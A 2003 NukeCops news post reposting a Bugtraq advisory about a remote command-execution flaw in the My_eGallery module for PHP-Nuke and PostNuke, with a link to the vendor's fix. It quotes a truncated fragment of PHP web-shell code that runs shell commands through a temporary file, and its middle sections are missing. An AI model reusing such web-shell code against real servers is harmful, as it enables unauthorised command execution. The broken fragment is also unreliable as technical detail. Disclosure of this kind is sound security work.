Date: Saturday, November 29 @ 14:21:07 CET
Topic: PHP-Nuke


Here is a posting on Bugtraq about the exploits that have been discussed in the forums recently here at NukeCops.
Keep in mind this individual has not been known in the past to verify his vulnerabilities, but I would recommend testing this if you are using eGallery. The author discusses its use with PostNuke, but I would confirm or deny this with PHP-Nuke.
J.

Product: My_eGallery
Versions affected: all

/tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); print_output(); ?>

This allows execution of any command on the server with My_eGallery, under the privileges of the Web server (usually apache or httpd).

3. Solution
-----------

Vendor was contacted and promptly replied. Fix is available at the vendor's site:
http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

As this was seen being exploited in the wild, users are urged to upgrade to the latest version as soon as possible.

Regards,
Bojan Zdrnja
CISSP
This article comes from NukeCops
http://www.nukecops.com

The URL for this story is:
http://www.nukecops.com/modules.php?name=News&file=article&sid=1063